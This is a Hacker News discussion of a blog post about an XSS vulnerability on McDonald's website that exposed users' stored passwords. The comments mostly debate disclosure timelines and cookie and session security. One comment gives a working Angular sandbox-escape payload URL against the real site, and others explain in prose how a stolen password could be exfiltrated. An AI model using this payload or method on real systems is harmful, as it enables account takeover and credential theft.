Hacker News new | comments | show | ask | jobs | submit login
Stealing passwords from McDonald's users (finnwea.com)
544 points by chx 247 days ago | hide | past | web | 164 comments | favorite



The author of the article removed the disclosure timeline before this was posted to HN.

The disclosure timeline was something around 5 business days before the author posted this article. Extremely unprofessional and irresponsible.

EDIT: Original timeline can be found at https://web.archive.org/web/20170116061303/https://finnwea.c...

    24 Dec 2016 17:27:56 GMT	Reported the vulnerability to McDonald's via Twitter multiple times (no response).
    28 Dec 2016 21:28:39 GMT	Reported the vulnerability to McDonald's NL via mcdonalds.nl (they couldn't help).
    28 Dec 2016 21:36:12 GMT	Requested disclosure assistance on HackerOne (no response).
    30 Dec 2016 13:04:32 GMT	Reported the vulnerability to McDonald's via phone (they would contact me ASAP).
    05 Jan 2017 23:31:42 GMT	Public disclosure.


It was 12 days from his first attempt.

It sounds like he had some trouble reporting it. Looks like he never received a call back so he decided to release it to the public. The timeline reads like he did it out of some spite.

It would be frustrating to go through all of this free highly specialized work and not find someone who cares at McDonalds.

But I'd at least give it a bit more time. Especially considering his first attempt at contact was around Christmas...


I've worked with the McDonald's web team before. They do care about performance and security. I reverse engineered an undocumented (to them) protocol for a game system in order to write tests for it--which was really, super fun to watch run.

McDonald's uses 3rd parties for most of their main development work. In the case above, the developers were in Australia, while McDonald's is in US Central Time and I was in US Eastern time. When I reported problems and provided suggestions, they usually had a conference call with McDonald's, the Aussie devs, and my team within 12 hours. If it was a weekend, it was Monday night. McDonald's core team takes this very seriously.

The difference here was that I had all the right phone numbers and am known to them. I was working for a well known publically traded company, which carried weight by itself. I don't know that if I didn't have the right contacts, hadn't been to their HQ and met with the VP/IT and Director of Online, would they have taken what I said seriously?

Secondly, this was the US Christmas and New Year's holidays. They were running a skeleton crew. As Adrian Cockcroft, former lead cloud architect at Netflix, once said, the time Netflix is the most stable is Christmas and New Year's because there aren't any engineers around.

With all that, they need to take this as a wake-up call and have a security response system, even if they contract a 3rd party for that also. There must exist, or this is a nifty startup idea, 3rd party firms that go through security@company.com emails, including the reams of spam, and there should be an optionally anonymous security problem reporting form with a captcha to get information such as this to the right people.

Lastly, 12 days is extremely short under any circumstance. While I'll admit that it can be extremely frustrating to not get a response, I believe 30-days should be the minimum time before first notification and publication with details. If a security firm wants PR for finding the problem, the post that there IS a problem first and wait the full 30-days from initial contact attempts before disclosing the details.

--Donald


>> It would be frustrating to go through all of this free highly specialized work

Give me a break. He didn't perform "free highly specialized work". If only I could walk uninvited into any business of my choosing, do whatever work I feel like doing without being hired - or even talking to someone first - and then demand attention, recognition, and/or payment.

Anyone who releases security vulnerabilities to the public without acknowledgement from the company is an unprofessional parasite on society. Even moreso with there being less than a month between discovery and public release.

I hate conglomerates, but if McD's has an avenue to sue for damages, I wouldn't bat an eye out of sympathy.


Not the author, but it was absolutely, definitely not removed before this article appeared on HN. It may have been removed afterwards, but when I read this article last night that timeline was there. It was even discussed elsewhere in this thread.

No comment on the timeline itself.


>Extremely unprofessional and irresponsible.

Agreed, especially considering the timing with Christmas and New Years holidays, they probably could not get the word down to their engineering team.


> >Extremely unprofessional and irresponsible.

> Agreed

How ungrateful. Someone puts in free work to make the world safer by fixing someone else's problems and they're a jerk because they didn't pamper them enough in the process.

> considering the timing with Christmas and New Years holidays, they probably could not get the word down to their engineering team.

Then this serves as a notice that they need to be able to - in about 15m, 365 days a year. Reality calling. fwiw, fixing a problem like this is almost always trivial. Not making the product bullet-proof, but simply disabling logins or whatever is needed to keep it from being exploited until it can actually be fixed.

A change of mindset (and stopping blaming the researchers) is all it takes to go from a many-month patch cycle to shipping mitigations inside of 12h.

Can you imagine a real engineer complaining about warnings, for instance that their bridge supports were crumbling, and how the discoverer didn't go through the reporting process.


> Can you imagine a real engineer complaining about warnings, for instance that their bridge supports were crumbling, and how the discoverer didn't go through the reporting process.

In your example the engineer should then proceed to blow up the bridge all while road users are still on it.


I imagine they'd block it off and not let anyone drive on it.

Or you know, murder. Maybe you're right.


What are your thoughts on what a professional and responsible disclosure time is?


Google in their "Disclosure timeline for vulnerabilities under active attack,"[0] states 60 days for disclosure for discovered security vulnerabilities and seven days for critical, currently known in-the-wild security bugs under active exploit.

[0] https://security.googleblog.com/2013/05/disclosure-timeline-...


Much more than 12 days. Below is a copy/paste of a recent security vulnerability timeline:

2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities

2015-12-14 | dotCMS > me | they were planning fixes in upcoming release, estimated to beginning of 2016

2016-03-16 | dotCMS | dotCMS version 3.3.1 release (CVE-2016-4040 still not fixed)

2016-04-07 | me > dotCMS | what is the situation with reported vulnerabilities?

2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which is estimated to be out in mid-April

2016-04-19 | dotCMS | dotCMS version 3.5 release

2016-05-10 | dotCMS | dotCMS version 3.3.2 release

2016-10-31 | me | Full Disclosure on http://security.elarlang.eu

Source: http://seclists.org/fulldisclosure/2016/Nov/0

This timeline from first report to full disclosure was 10.5 months. Note that I did not go looking for a long timeline, this was the first item when I Googled "CVE disclosure timeline."

--Donald


Yeah, and it's absolutely uncorrelated to what the company feels comfortable with.

Maybe 24h? If you can't respond and mitigate within that time frame you aren't operating on internet time.

> From policy quote in sibling post: "[...] currently known in-the-wild security bugs under active exploit."

Nonsense. Every bug you discover could have been discovered by an attacker, and attackers are constantly scanning. If the bug is in release software you have to assume it's known and being exploited.

btw, for the downvoters - I know I speak the truth because I've worked dev in an internet-security company, and in security in a major cloud company. We can turn patches (or mitigations) out in hours and have them canaried and live in 24h. This is absolutely doable and should be expected. This months nonsense is when the company doesn't want to fix the bug.

What it takes is the institutional will to disable a feature you bill for until you secure it. When a $millions/day loss is on the table you find that obstacles evaporate. If a company tries to keep their vulnerabilities under wraps there wouldn't be this cost, and thus no will to fix it, in an ever-worsening spiral.


This seems to be a common practice, storing UserIDs, Usernames, etc. in cookies rather than a unique SessionID that can be used to look those things up (and will expire). I'm curious as to where people are getting the idea to build things that way.

Because it never would have occurred to me to do so. Or rather, had it occurred, it would have immediately begged the question of "what happens when the user monkeys with their cookie". Surely everybody else thinks the same way.

If so, how do we end up with this? Are there really "Teach yourself in 21 Days" books that have examples with this pattern that people are following?

Or does everybody just assume that they're going to be Facebook with 4000 servers and no way to quickly generate or store or manage or look up those keys for millions of simultaneous users, and that it's worth the tradeoff?


A couple of rambling thoughts on how we get here:

1. Lack of experience. Most web devs that's I've met have never even heard of using expiring session tokens in a cookie. (imho) It's been my experience that most javascript guys can be relatively young as it's the new teaching language (sorry python). They spend most of their time learning react/redux/moxd/angularjs2/vue and just haven't been exposed to security practices like expiring session tokens in cookie. It's not their fault, it's just that we don't know, what we don't know. Not realizing that this practice has been around for almost 20 years, the developer invented a new way of logging in using cookies.

2. Most people don't take security seriously. I recently had a conversation with a dev that was being a cool kid by using JWT bearer tokens. He was putting admin=true inside the bearer token and signing it. I asked him what would happen if I stolen his token. Would I become the admin? The answer appeared to be yes, the software would read the bearer token, inject admin=true into your session, and give you admin rights on the webserver. However, he explained the expiration of the JWT token was 1 hour. So I steal and use your token I only have 1 hour to become admin on your site?, I asked. Apparently he felt that was good enough.

3. Security is expected to be provided by the framework. XSS, CSRF, SQL injection - don't worry we're using Django. That seems to be the expectation of most people. You don't need to know about security, because the framework handles that. The problem is that this only gets you so far, there are things that live outside of the scope of the framework that you probably should know about, but don't. (I guess storing the user's password in a cookie would be one of those)


I don't see how number two is a security issue. Maybe I'm misunderstanding or maybe I'm ignorant. If I steal an admin's session token, it follows that I get to be an admin. How does a JWT with admin=true exacerbate this issue, or how would any other type of session token mitigate it?


Well, the comment you're replying to only described the issue as "being a cool kid by using JWT bearer tokens", which isn't enough information to accurately describe what's happening. One can only guess...

A JWT is just a base64 encoded JSON object that has a signature. You can pass one to any base64decode() function to see the actual data, so the important part is checking the signature to see whether it's been tampered with.

But the whole "admin=true" part, while it doesn't sound like best practice, isn't inherently less secure than using the JWT notation for scopes. "admin=true" might as well be "scope=admin" so the person criticizing the "cool kid" doesn't seem to understand JWT usage themselves.

What's important is where you sign and verify a JWT: Signing means using a secret key, which means actually having a secret key stored, which means that it has to happen server-side.

Proper JWT usage means that both the data creation/signing and data reading/verifying are always happening on the server, and you've got to trust the security of your servers, since they have the ability to read your shared secret key.

So to be secure, you shouldn't really send the JWT to an insecure client like a web browser at all. Since anyone can read a JWT, you're unnecessarily leaking information about the inner workings of the app, just giving hackers important info like the variable names you're checking for.

Instead, the best move is to use key/value storage for hashing your JWT into garbage and sending that over to the browser. When the user performs an action, they'll send the nonsense key and the server will retrieve the actual JWT and verify/perform the actual request handling.

Of course, this just takes the conversation back to session handling. There are various ways to mitigate the risk of someone stealing another user's session data and using it to impersonate the user, but those aren't unique to JWT.

Anyway, the comment above doesn't give enough detail about what the "cool kid" was doing in order to determine whether it was bad security or not. Sounds like either a lazy description of the actual scenario, or a poor understanding of JWTs.


It is an extra vuln. if the JWT only has the role=admin K/V, and no expiration value.

A jwt that is only valid for a certain time is no less secure than a session id, as long as you verify the signature correctly.


Curious about the 2. JWTs are signed via a secret key right? Couldn't the backend verify the signature and reject the token. I am pretty confident most JWT implementation does that automatically.

The dude just didn't think about that or looked into how JWTs work. Which I believe is even worse :<


I think you're thinking of a different attack vector, namely, forging a new JWT.

Whereas the parent poster said "what would happen if I stolen his token" (for example, via XSS). So in that case, it's a legit token in the hands of a bad actor, and the signature would be still be valid as far as the backend could tell.


Your #2 explanation is vague. Are you saying that the system had no server-side storage of whether a given user had admin rights or not?

In #1 you mention "security practices like expiring session tokens in cookie" and then go on in #2 to say that the exact same thing isn't good enough. You do know that the T in JWT stands for "token", right?

Are you sending raw JWTs straight to the browser? Why? That's the big problem, not setting "admin=true" inside of a JWT. The data in a JWT is a claim that's meant to be verified by signing. It's no more and no less.

If you want to describe the OAuth implementation or something more substantial than a "cool kid" then it might be more illuminating, but you don't give any context.


>It's been my experience that most javascript guys can be relatively young

I really don't understand how these people make it through the magic 'must have 5 years experience' marker and just don't know proper security practices. It seems like people just lie on that.


They lie because the constraint is a lie. The years of experience requirement is entirely made up by a lazy hiring manager, and is just a poor proxy for "has this person tried and failed and learned enough from their mistakes to make well-reasoned decisions about future things without my constant oversight and input."


About #3, storing user authentication is one of the best examples¹ of things you should rely on your framework for. It's not as simple as it looks like, what is considered "safe" changes suddenly, and it is very standardized.

And it's well within the scope of Django.

The blame is almost completely in #1 and #2.

1 - And, yes, protection against XSS, CSRF, and SQL injection are other great examples.


>> Are there really "Teach yourself in 21 Days" books that have examples with this pattern that people are following?

Yes. From Learning PHP, MySQL, Javascript, CSS & HTML5, Third Edition, from O'Reilly publishing:

So, to create a cookie with the name username and the value Hannah that is accessible across the entire web server on the current domain, and will be removed from the browser’s cache in seven days, use the following:

    setcookie('username', 'Hannah', time() + 60 * 60 * 24 * , '/');
And that was published in 2014, not 2004.


A username is different from a password. There can often be legitimate or at least semi-legitimate reasons to do this.

I dunno everyone has to learn how to use cookies if they are building web apps.

Password is obviously just bad.


Everyone, really?

I've been building webapps since forever and I've never cookies directly in Javascript like that and I can't, personally, think of a use case where I would do that.

I've only used cookies that store a session id and I store everything in the session. The session id cookies are handled entirely by the servlet container.

I don't believe I'm doing it horribly wrong.


What you stated is pretty normal seeming to me, so no, not "everyone". But I think web developers still need to know what a cookie is and how to use it, even if you dont use them often. They can provide a better user experience remembering some aspects of a user or their session long after it has expired. Many sites have semi-authenticated states where you may not want to hold user data, but still remember some details about their session.


User IDs and usernames, are generally public information, so I do not see the problem with storing that in a cookie, as long as you authenticate it (e.g. using a MAC, and you might want to include a timestamp and a version number). It does however sacrifice server-side control of sessions.


To answer your question about monkeying: Sign the cookie! We sign session cookies with HMAC, and reset the session if it doesn't match. Doesn't handle replay attacks, but you at least know that you're getting back the same data that you gave the client.


Doesn't handle replay attacks...

This is why we have CSRF tokens, right? Orthogonal to session cookies, but when used together they avoid this vuln.


Does signing the cookie with secondary information such IP or UA help? I know they can both be spoofed, but it's an extra layer...


Signing the cookie with IP would break the site for everyone with changing IPs, e.g. mobile users on cellular networks. Web site sessions should persist across IPs.


We were doing that previously in our homegrown framework. Session would include id, username, and an expiration timestamp along with a salted hash of that data to confirm. We've since moved away from it (and the entire homegrown framework, actually) because we realized it didn't make anything easier, but we've never had an issues with that data being in the session (it was all publicly available regardless).

In the end, though, it is probably best to err on the safe side and only expose a salted and hashed session ID via cookies, and then doing a server side lookup to get the necessary data (which you would need to do regardless)


It seems we revisit this topic or a branch of it often enough that it's almost becoming a meme.

Here is a 2-page, 7.4K security checklist. If you verify and check each box, your application won't be bulletproof (it is software and you have 3rd party libraries), but it will be close to air tight. --Disclaimer: I have nothing to do with this security checklist or its authors, except appreciation and respect.

Security Guide For Developers - Latest: https://github.com/FallibleInc/security-guide-for-developers...

--Donald


It's literally used on hundreds of websites. I'm sure there is a developer out there right now going "How does McDonald's do this?"


I don't think everyone assumes they're going to be Facebook, but they probably do assume (correctly not my opinion) that scaling session management up is a painful, and are doing their best to avoid it.

Consider it a teaching moment and show folks how simple it is to store all your session-like stuff in cookies, along with a timeout and a version hashed with the server's secret.


It's something i've steered away from, or I would encrypt the id before saving it in the session. I don't exactly recall where I picked it up, but i know i've seen it in example tutorials in books with Rails apps.


FWIW, all session information (`session[:user_id]`) is stored in an encrypted cookie starting with Rails 4.


Before reading, I thought this about was stealing information from public WiFi. After reading, I realize this is for the McDonalds website, but why do people need a password for their website?


You can register your family to a McD account and your kids below 12 get free meal coupons for birthdays. Someone I know maintains 4 imaginary kids to his family account and collects 4 free meals a year. :)


"Hi, I would like to collect these free meals for my totally legit kids, Little Bobby Tables, Asdf, Hunter123 and Admin."


Can't believe how much ; DROP TABLE "NAME"; has grown!


Thank you for the morning giggle :)


'Say hi to 'alert(1)' if you please!'


Nitpick: It's hunter2 not hunter123.

For anyone unfamiliar:

http://knowyourmeme.com/memes/hunter2


Presumably you knew he got it wrong because it wasn't *'d out for you?


Oh, never mind NULL.


That person you know thinks they're gaming the system, but McDonald's is the winner. They're keeping the customer hooked.


"Someone I know"


That is hilarious.

I remember when I moved to a new apartment once, two of my friends told me how to get free meals. Every time they moved they wrote several restaurants about their terrible experience, how their staff was unprofessional and how they were embarrassed brining their relatives there. They'd get like 15 free meal vouchers for Chili's, O'Charlies, Red Lobster, etc.


That's a real asshole move if you ask me. Blaming others for something they haven't done just to get some free meals.


You know that someone might get fired, right?


The use of "free" here externalizes the cost of the time it takes to write or call restaurants, which could be potentially used for more rewarding activities. And assuming that the person is not a sociopath, it also externalizes the burden of introducing a new internal dialogue that tells you that you're acting unethically.


Why would you do this when moving in particular?


Well, you can basically do it once with the restaurants in your new neighborhood. Otherwise it would probably ring the alarm bells for someone if the same guys are complaining and receiving vouchers multiple times. Anyway, it's a scam.


Why do you have to be near any of these restaurants to do this? I assume these are chains and the vouchers are valid at any franchise. Just spam complaints from different e-mails and never pay for food.

Seems like such an obvious scam there must be some reason it can't work.


For the mobile app.


They also have contests like Monopoly.


Neither of you answered the question:

> why do people need a password for their website?

Why does the mobile app need a password for the website? (Why does McD's need a mobile app?) Why does Monopoly need a password?

It worked just fine back in the days before there were mobile apps; peeling a sticker off fries doesn't require a mobile app. Heck, Coke was more fun back then because you could win a free coke or stuff. Now I'll never win a free anything, because I'll never sign up for every asinine website.

My data is either being sold, or stockpiled into a database that's waiting to be hacked.


Don't know why McD's has a mobile app, but Chick-fil-A has an awesome one that lets you place an order remotely, drive into the designated parking spot, press a button, and get the food run out to your vehicle. It's a lot of fun.


I saw this movie... I think it was called "Wall-E"?


Hehe. For what it's worth, the bugs aren't all worked out yet so you do have to walk into the building a lot to get your food. :P They also have it for dine-in customers.


Is Maccy's monopoly all digital now in the states or something?

Across the pond, we still get the little stickers and the fold out 'boards' to stick them on.

On a related note, I cleared out the zipper part of the notes section of my wallet the other day, mostly old receipts and bus tickets - but I also found a bunch of expired monopoly stickers from last year, 4 free apple pies, 2 free drinks, 1 free hot drink, 2 free cheeseburgers and 1 free fries.

Someone remind me to never put things away 'safely' when they have a use-by date on them...


You still get the physical pieces but they all have unique redemption codes printed on them. I assume if you win anything besides a free drink, they make you input the redemption codes to prevent counterfeiting.


Last time I check was for press, to get PRs before they are public (in the embargo period)


McD's has embargoed press releases? …about… what?


Yeah. Beats me too. What would an publicly traded firm with 30+k restaurants and half a million employees world wide be doing with a professional PR operation?


Maybe for delivery? I believe some McDonalds deliver, right?


They do here in Japan. But I am unsure if there is a login(from most examples I see here, I would assume they do though).


God, you live in Japan _and_ you have McDonalds delivery. I am seriously jealous right now!


I've heard delivered Maccy's isn't very good (mind, this was in Singapore, not Japan) - the food always arrives cold, sweaty and just generally gross.


I know that over the counter Mackas isn't very good. It's cold soggy and generally going to disappoint.


It's fine in Singapore, and they're always happy to replace an unsatisfactory order.


McDonald's delivers in NYC. They're even on Seamless.


Looking into the future here:

Amazon will surely deliver :D (pun intended)


24hours McDelivery in Hong Kong!


They do in Malaysia(!)


Never mind why people need a password; why does McDonald's even need to have a website of any kind in the first place?


Menus, Nutritional info, contact details, location map, franchise info, competitions, complaints, job listings and probably more.

(I've not actually checked the site to see if any of these are actually there, but.. these would be valid for nearly any fast food chain)


Pardon my ignorance, but how are the passwords actually stolen?

If I understand correctly, this exploit lets you execute arbitrary code on the search results page. And in this case, the code will load up an iframe from a separate place in McD's domain, get the 'penc' cookie and decrypt your own password.

So you would still need to send a link to a McD registered user, who clicked in Remember Password, and then presumably send his/her decrypted password to your own servers (how?). And also somehow steal their username/email.

Is that correct?


> Is that correct?

Yes, that's the classic XSS attack pattern. It's like phishing, but better since you're sending the person a link to the actual website. And once they've clicked on it, they're already screwed; they don't even need to manually enter any information.

> how?

Once you have the cookie, its as simple as something like making an XMLHttpRequest to your own server that includes the decrypted email and password from the cookies.


If they don't have X-Frame-Options the attacker can also just use a 1x1 iframe on a popular website or shitty ad network to trigger that page to load


It's pretty simple to exfiltrate data from the JavaScript sandbox once it has been compromised via XSS. The simplest way is probably appending an img tag to the page's DOM, with a src pointing to a server you control and send the user's password as the image name.


They still haven't fixed it. I'm only getting it to work in Chrome though, seems like the Angular sandbox escape doesn't work in Firefox. See for yourself (I'm only posting the more harmless alert demo, but the others work too):

  https://www.mcdonalds.com/us/en-us/search-results.html?q=%20{{x%20%3D%20{'y':''.constructor.prototype};%20x['y'].charAt%3D[].join;$eval('x%3Dalert(1)');}}
Then again, I wouldn't expect them to fix it very fast, considering how abysmal it is to basically store a user's password in a cookie in the first place.


I tried decrypting my password on the search page using a malicious search payload, but it didn't work. Somehow, the cookies contain hidden characters on the search page causing the getCookie method to fail. The getCookie method tries to trim whitespaces from cookie values. In the images below you can see .charAt(0) returns a strange string when executed on the search page.

Note that the author doesn't seem to have checked what the sandbox escape itself does: it redefines the charAt function to be Array.join, so of course it produces garbage!


Probably unlikely that McDonalds built that themselves. I would guess they contracted it out. It's been a long time since I knew anyone in their in-house IT division but it was entirely back office stuff not public facing.


They own the company that develops their software[1] as far as I know. It's a subsidiary.

[1]: This company: https://www.rdisoftware.com/


They only work on POS & POS data related applications for McDonald's. They were purchased because of this fact.


True. Very likely an interactive creative agency built the app.

In-house IT typically controls the DNS 'A' record and reviews/oversees deployment of provided assets.


Given this grammatical error:

> "Do you want to search <query> in news section?"

I'd guess it was built by an Eastern European agency.


Biggest problem here is their architectural design. They're mixing server side code with front end. They're printing angular code using back end, but they are not filtering {} characters. Basically, user can execute any angular code, therefore any javascript.


Yeah, this problem is basically unsolvable if you wish to have { characters anywhere in your page from server-side rendering.

- Have the possibility of {{ and }} in your server-side output (or whatever symbols you configured Angular for)

- Have Angular.JS on a page with server-side output

Choose one.

It's important to realize that this affects things like user input as well. So form initials/form defaults can also be affected by this issue!

A bit of a silly way to fix this problem is to modify your server-side escaping function (surely you have this!) to "escape" {{ with {<zero-width space>{. This will mess up things that need to be equal to each other, and can poison user input (because of form initials) but will protect you from this issue.


If you're displaying user input you could just encode to their matching HTML entities...

&#123; or the human friendlier one &rcurb (?)


that doesn't work because the HTML entity decoding happens before Angular does the scanning of the DOM for the brackets. So even if you use &rcurb; output from the server, Angular will still interpret the brackets "properly"

As to why this works this way, consider the following:

do you have to do HTML entity decoding when getting an input value from Javascript?


Correct me if I'm wrong but it appears they are now filtering the {} characters by URI encoding them upon submitting a search.

This isn't to say they've fixed anything else yet (I haven't looked), but it may mitigate the efforts of the lazy (like me in this instance).


There were no filtering last time I've checked. Now, it looks like they've fixed the problem by completely deleting search results page, it's returning 404 :)


Their mobile application does or did send their Google GCM API keys to the client, along with a bunch of other bizarre server configuration information. I had no way to report it; I tried sending an email to their WHOIS contact to no avail.

If anyone has successfully reported a vulnerability to them, let me know!


GCM keys means you can send notifications to other users of the app?


So the attack vector here is to send someone a link to the search results page with a malicious query that injects JS into the page to decode the users password and then submit it to the attacker's backend collection server? Is that right?


No. A more effective vector would be to send them to a funny video page to watch, that has nothing to do with McDonalds. And inside that video page you have a hidden iframe pointing to the malicious query which submits the McDonald's password to another backend server.


meh, make a mcdonalds.com search link that generates "Congratulations, you won a free mechanically deboned meat product!!1" and share it on bookface.


That's the basic principle of XSS. A few years ago an XSS epidemic broke out where dozens of major websites were found to be vulnerable to cookie theft. Attackers could make a single page with dozens of sneaky iframes, one per vulnerability. Usually the contents of the cookie allows you to continue a user's session, though there can be all kinds of stuff idiotically stored directly in the cookie, as can be seen in this prime example.


As we close the barn doors after the horses have left, we are left to ponder these two valuable resources for further edification.

[1]https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_...

[2]https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet


   They use the same key and iv for every user
 
What dev sits down, starts writing code, and thinks something like this is a good idea? Not to mention all the other problematic choices.


You ask this question, but it seems like you don't know how the real world works.

In a lot of places, you aren't asked to build a product. Especially if your core isn't technology. You are on a tech team that exists within the structure of a large organization that really doesn't care about technology at all. It's just a thing they want on a check list.

So you get asked to throw something together to see if people like it. So you do. And you don't in your wildest dreams think that this piece of shit is going to see the light of day. It's just concept.

And then the next thing you know, some assclown decides it's good. Okay great. But you didn't hear about it because the company is the size of McDonalds. Not a small startup with 6 people who all know what they are doing.

So ops and infra get together and deploy this toy shit that you thought was just a joke mostly, and now you have incredible security problems.

That's one way this happens.

There are many others. Reality is a lot more complicated than what you are trying to suggest.


> So you get asked to throw something together to see if people like it. So you do. And you don't in your wildest dreams think that this piece of shit is going to see the light of day. It's just concept.

One of my previous products was a custom failover application for one of our customers. It took a year on and off, with a quick prototype to see if we were on the right track ("yep looking good!"), rewriting as proper application, sending test verisons ("yep, we received it!"), getting replies back ("yep, the new update works!"), after which we decided it done and parked the project.

Then came a feature request. They wanted us to change some text in the program that was annoying one of the operators. Specifically, the text "!! PROTOTYPE VERSION - DO NOT USE !!" in the window title, and the "!!PROTOTYPE VERSION - DO NOT USE!!" text in large letters on the main window. It was also called "PROTOTYPE" in the start menu launcher, but they'd helpfully managed to rename that themselves.

So yeah, they were still using - in production - the initial quick test I bashed together in two days, and some CA on our end or customer representative in the middle was either horribly confused or just faking the project management part all the time.


"Not a small startup with 6 people who all know what they are doing."

Another scenario is a small startup with 6 people who _don't_ know what they are doing, but the auth code has got to get written somehow. By the time the company gets big enough to have major high profile customers the person that wrote the auth code is now in a senior management position, the senior devs don't want to touch the auth code because it "works" and they know better than to break something just because a junior programmer has raised a theoretical issue they only just understand and they've never seen in the real world.

(I may have been that junior programmer. I'm sure there have been more since then.)


Also, that tech team might in another large organization (not McDonald's) in another part of the world, where any work they do has to be budgeted for, agreed on, spec'd, tested, and released through a tedious process.

Someone might be casually thinking "hmmm this doesn't seem quite right" but there would be a dozen hurdles to jump from that suspicion to getting anything done about it, so they keep quiet and move onto the next project. They might never even know or care if their code went live.


>> budgeted for, agreed on, spec'd, tested, and released through a tedious process

This. You have to spec out even the most simplistic security practices when you send work to a remote team or they won't get implemented.


I heard this happened with an air traffic control monitoring demo after 9/11.


Developers at agencies with extremely tight deadlines. 'Caring' brings no revenue and if it means you miss the deadline, it actually means less revenue.

Thus agency developers tend to implement the bare minimum to show it working. Everything else is chargable later.


- hey dude, what is this "key" parameter?

- IDK, just copy this code from the stackoverflow, it works for me


I would generally assume it's much closer to "code, code, code, cookie[key] = crypt(password), code, code".

Many (most?) crypto libraries have incredibly accident-prone APIs. When presented with both `crypt(input) -> encrypted` and `crypt(input, iv, nonce, secret, etc, wtf, abc | 23 << 2) -> encrypted`, which do you choose?


I like how the page title changes to "Are you still there?" when you switch to a different tab.


Is it legal to publicly post a website security vulnerability? Or in other words, what is the legal process (let say in US) to notify a website/vendor that their app/website is vulnerable, without being accused of hacking?


There is not clear legal structure, but two practices are commonly advertised by white-hat professionals:

- only test your access on your own (test) accounts; as long as then can’t prove that you accessed someone else’s information, you should be fine; anecdotally, I have worked for Facebook, where you are not supposed to create fake accounts; on the white-hat page, you can ask to have test accounts for that purpose exclusively: those are entirely independent from the rest of the graph and you are joyfully encourage to try to hack yours;

- warn the security team ahead of time and tell them without feedback from them, you will publish the information in X weeks. If what you have found is valuable, you should hear back fast; if they do not respond, you can argue that it was their silence who let you know this was not their priority (a legally dubious argument but most of the community will be happy to criticise their silence). You are not bound by their response (some corporations can be very unreasonable) but specifying that you have not hacked any account except a test one should help you if they throw lawyerese at you.

One way to avoid being caught off-guard by those is to have a bounty program, but that’s not in security consultants’ hands.


This is a real cool way to explain XSS in an easy concrete way. Love the thought process and actual code examples.


That disclosure timeline is very aggressive over the holiday period.

Did they ever get in touch with you after the 5th?


Agreed - the timeline is over the most popular period of the year when most 'back office' people (i.e. IT teams, management, and others not involved in direct customer service) are away. The least the OP could have done is waited until mid-January to release to public to allow them time to get some resources onto the problem IMO.


Would be surprised if a company like McDonalds had no emergency crisis procedure to handle issues that would damage their reputation anytime, anywhere and recall people even when they are off on holidays. Maybe they thought it was not worth taking it seriously.


I agree, but like someone else pointed out on this thread, this was probably a third party agency who built the site. If they had closed shop for the holidays, and everyone at the agency was overseas visiting family etc., then the response would be difficult.

At best, perhaps a programmer could be pulled away from his Christmas pudding to hack a patch remotely on his laptop, or take down the site entirely until they could handle it properly?

Just speaking from my own experience here - I run a small web dev agency, and I know that during the Christmas break, we can only offer rudimentary patch up work for our clients, and that is only depending on the internet connection at wherever our team members are.


Just a reply of "Hi, our IT staff confirms this is a security issue. We intend to fix it as soon as possible. Thank you for your help." doesn't need to wait for the 3rd party agency to come back from holiday.


Edit: Realised I was being dumb here. I get it now.


If you can sniff other users' cookies, you can get their passwords. Good thing no one reuses passwords across sites!


Where the proof-of-concept shows the password in an alert box, a malicious implementation can send it to a remote server. What his proof-of-concept page does, any website can do.


Yeah, the disclosure comes close to violating their own Responsible Disclosure policy, which is 3 business days.

If McDonald's enployees get the holidays off and go back to work on the 3rd, they would have had 2 days to respond. Meaning that if McDonald's disclosed a vulnerabilty to Finnwea.com over the same time period, finnwea.com says they might have sued them.

So maybe that guy was a little trigger happy. Great hack, though.


I could be wrong but it sounds like your comment is confused about what a business day is. If a firm decides to let some individuals have the whole time off during the holiday period, that doesn't mean those aren't business days from an external perspective.


Yes, because a company at #109 on the Fortune 500 shouldn't bother spending money on 24/7 infosec.

"Responsible disclosure" is simply a meme to reframe "instant full disclosure" as irresponsible, which is dishonest.

Do you think journalists sit on the final results of corporate negligence investigations while giving the guilty parties time to clean up their act?

Look at this bug, in particular. This is not about this bug; this is about basic negligence. It would have been completely appropriate to blog about this on day zero of discovery. This is not about "time to patch", this is about "time to convince the widest number of people that you should never trust McDonalds with your data".


> Do you think journalists sit on the final results of corporate negligence investigations while giving the guilty parties time to clean up their act?

I've worked at a newspaper. Your framing of the question is deliberately silly - they'd sit on it to prevent innocents from being harmed, not to protect the guilty.

Once it's fixed (or after a reasonable amount of time not getting fixed), then they happily nail the guilty people to the wall.


Agreed. It can take months to connect with some big companies. Reported via Twitter? Come on.

Tip: InMail on LinkedIn can be quite effective if you're having trouble. Start at the ceo and work your way down.


Is your hit rate on LinkedIn for security issues that high? Mine's in the single digits, almost as bad as email.

What do you say in your InMail messages that give you a higher response rate? Are you using premium services?


Yes you have to pay for InMail. Just be clear and concise. Worked for a Freshdesk vuln we reported. I pinged the ceo.


That brings up an interesting question though. How long is long enough for disclosure in cases where the company has made it impossible to notify them of a vulnerability? If someone tries 10 different ways to get in touch and makes absolutely no progress it would seem that it would be better to disclose sooner rather than later.

Giving companies plenty of time to fix a vulnerability is one thing but if the company isn't even working on the issue because they've isolated all external contact at least if disclosure happens sooner that's less time that an unknown attacker can use that vulnerability without anyone being aware of the issue.


This isn't a buffer overrun that's hard to detect though, this seems like something that should have been found using more proactive measures.


No excuse. It's the middle of January now, the holidays are long over, and they're one of the biggest companies on the planet. They had plenty of time to respond.


> they're one of the biggest companies on the planet

Yeah, making hamburgers! Out of 420,000 employees, they have all of 17 IT jobs on their career site.

They deserve a break today.


I get both of you, yeah its a big company and it is a fast food restaurant. Considering that a company this big has a lot of workers that do not have that many days off during the holidays, there should still be mail read, and IT can't just up and leave for weeks. There surely have to be a few people on standby. But the IT department probably doesn't know much about the website, and for the website makers it does not make sense to be available all the time. IT could still remove the login feature(shutdown the login server) until after the holidays, provided that IT gets the message.

Conclusion: Bad excuse for a company this big, their communications being offline for so long is bad. But it is within reasonable to wait a little longer with disclosure, considering the mistakes made on the website, publisher should realise that the company hasnt put that much resources into this who security thing.


Nah, they deserved this disclosure and proof of concept today.


> Yeah, making hamburgers! Out of 420,000 employees, they have all of 17 IT jobs on their career site.

How many credit cards get swiped/waved per day at their PoS terminals? If they don't have a 24/7 infosec team they're Doing It Wrong™.


I'm not sure that agrees with the franchise model. McDonald's corporate owns the real estate, but not most of the businesses. So most of those terminals aren't actually theirs.


